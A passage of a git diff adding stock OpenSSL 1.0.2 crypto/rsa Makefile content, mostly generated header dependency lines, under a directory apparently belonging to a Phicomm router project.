+rsa_err.o: ../../include/openssl/symhacks.h rsa_err.c
+rsa_gen.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_gen.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_gen.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_gen.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_gen.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_gen.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_gen.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_gen.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_gen.o: ../cryptlib.h rsa_gen.c
+rsa_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_lib.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_lib.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_lib.c
+rsa_none.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_none.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_none.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_none.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_none.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_none.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_none.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_none.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_none.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_none.c
+rsa_null.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_null.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_null.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_null.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_null.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_null.c
+rsa_oaep.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_oaep.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_oaep.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_oaep.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_oaep.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_oaep.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_oaep.o: ../../include/openssl/opensslconf.h
+rsa_oaep.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_oaep.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_oaep.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_oaep.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_oaep.o: ../constant_time_locl.h ../cryptlib.h rsa_oaep.c
+rsa_pk1.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_pk1.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_pk1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_pk1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_pk1.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_pk1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_pk1.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_pk1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_pk1.o: ../../include/openssl/symhacks.h ../constant_time_locl.h
+rsa_pk1.o: ../cryptlib.h rsa_pk1.c
+rsa_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+rsa_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+rsa_pmeth.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+rsa_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_pmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rsa_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_pmeth.o: ../../include/openssl/objects.h
+rsa_pmeth.o: ../../include/openssl/opensslconf.h
+rsa_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_pmeth.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_pmeth.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_pmeth.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_pmeth.o: ../../include/openssl/x509v3.h ../cryptlib.h ../evp/evp_locl.h
+rsa_pmeth.o: rsa_locl.h rsa_pmeth.c
+rsa_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_prn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rsa_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rsa_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rsa_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_prn.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_prn.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_prn.o: ../cryptlib.h rsa_prn.c
+rsa_pss.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_pss.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_pss.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_pss.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_pss.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_pss.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_pss.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rsa_pss.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+rsa_pss.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_pss.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rsa_pss.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_pss.c
+rsa_saos.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_saos.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_saos.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_saos.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_saos.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_saos.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_saos.o: ../../include/openssl/opensslconf.h
+rsa_saos.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_saos.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_saos.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_saos.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_saos.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_saos.o: ../cryptlib.h rsa_saos.c
+rsa_sign.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_sign.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_sign.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_sign.o: ../../include/openssl/opensslconf.h
+rsa_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_sign.o: ../cryptlib.h rsa_locl.h rsa_sign.c
+rsa_ssl.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_ssl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_ssl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_ssl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_ssl.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_ssl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_ssl.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_ssl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_ssl.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_ssl.c
+rsa_x931.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_x931.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_x931.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_x931.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_x931.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_x931.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rsa_x931.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_x931.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_x931.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_x931.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_x931.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile.save
new file mode 100644
index 0000000..f96f6b7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile.save
@@ -0,0 +1,291 @@
+#
+# OpenSSL/crypto/rsa/Makefile
+#
+
+DIR=	rsa
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=rsa_test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= rsa_eay.c rsa_gen.c rsa_lib.c rsa_sign.c rsa_saos.c rsa_err.c \
+	rsa_pk1.c rsa_ssl.c rsa_none.c rsa_oaep.c rsa_chk.c rsa_null.c \
+	rsa_pss.c rsa_x931.c rsa_asn1.c rsa_depr.c rsa_ameth.c rsa_prn.c \
+	rsa_pmeth.c rsa_crpt.c
+LIBOBJ= rsa_eay.o rsa_gen.o rsa_lib.o rsa_sign.o rsa_saos.o rsa_err.o \
+	rsa_pk1.o rsa_ssl.o rsa_none.o rsa_oaep.o rsa_chk.o rsa_null.o \
+	rsa_pss.o rsa_x931.o rsa_asn1.o rsa_depr.o rsa_ameth.o rsa_prn.o \
+	rsa_pmeth.o rsa_crpt.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rsa.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rsa_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_ameth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+rsa_ameth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+rsa_ameth.o: ../../include/openssl/cms.h ../../include/openssl/crypto.h
+rsa_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_ameth.o: ../../include/openssl/opensslconf.h
+rsa_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_ameth.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_ameth.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_ameth.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_ameth.o: ../asn1/asn1_locl.h ../cryptlib.h rsa_ameth.c
+rsa_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+rsa_asn1.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+rsa_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_asn1.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rsa_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rsa_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_asn1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_asn1.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_asn1.o: ../cryptlib.h rsa_asn1.c
+rsa_chk.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+rsa_chk.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+rsa_chk.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_chk.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_chk.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_chk.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_chk.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_chk.o: rsa_chk.c
+rsa_crpt.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_crpt.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_crpt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_crpt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_crpt.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_crpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_crpt.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_crpt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_crpt.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_crpt.c
+rsa_depr.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_depr.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_depr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_depr.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_depr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_depr.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_depr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_depr.o: ../cryptlib.h rsa_depr.c
+rsa_eay.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_eay.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_eay.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_eay.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_eay.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_eay.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_eay.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_eay.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_eay.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_eay.c
+rsa_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+rsa_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+rsa_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rsa_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rsa.h
+rsa_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_err.o: ../../include/openssl/symhacks.h rsa_err.c
+rsa_gen.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_gen.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_gen.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_gen.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_gen.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_gen.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_gen.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_gen.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_gen.o: ../cryptlib.h rsa_gen.c
+rsa_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_lib.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_lib.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_lib.c
+rsa_none.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_none.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_none.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_none.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_none.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_none.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_none.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_none.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_none.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_none.c
+rsa_null.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_null.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_null.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_null.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_null.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_null.c
+rsa_oaep.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_oaep.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_oaep.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_oaep.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_oaep.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_oaep.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_oaep.o: ../../include/openssl/opensslconf.h
+rsa_oaep.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_oaep.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_oaep.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_oaep.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_oaep.o: ../constant_time_locl.h ../cryptlib.h rsa_oaep.c
+rsa_pk1.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_pk1.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_pk1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_pk1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_pk1.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_pk1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_pk1.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_pk1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_pk1.o: ../../include/openssl/symhacks.h ../constant_time_locl.h
+rsa_pk1.o: ../cryptlib.h rsa_pk1.c
+rsa_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+rsa_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+rsa_pmeth.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+rsa_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_pmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rsa_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_pmeth.o: ../../include/openssl/objects.h
+rsa_pmeth.o: ../../include/openssl/opensslconf.h
+rsa_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_pmeth.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_pmeth.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_pmeth.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_pmeth.o: ../../include/openssl/x509v3.h ../cryptlib.h ../evp/evp_locl.h
+rsa_pmeth.o: rsa_locl.h rsa_pmeth.c
+rsa_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_prn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rsa_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rsa_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rsa_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_prn.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_prn.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_prn.o: ../cryptlib.h rsa_prn.c
+rsa_pss.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_pss.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_pss.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_pss.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_pss.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_pss.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_pss.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rsa_pss.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+rsa_pss.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_pss.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rsa_pss.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_pss.c
+rsa_saos.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_saos.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_saos.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_saos.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_saos.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_saos.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_saos.o: ../../include/openssl/opensslconf.h
+rsa_saos.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_saos.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_saos.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_saos.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_saos.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_saos.o: ../cryptlib.h rsa_saos.c
+rsa_sign.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_sign.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_sign.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_sign.o: ../../include/openssl/opensslconf.h
+rsa_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_sign.o: ../cryptlib.h rsa_locl.h rsa_sign.c
+rsa_ssl.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_ssl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_ssl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_ssl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_ssl.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_ssl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_ssl.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_ssl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_ssl.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_ssl.c
+rsa_x931.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_x931.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_x931.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_x931.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_x931.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_x931.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rsa_x931.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
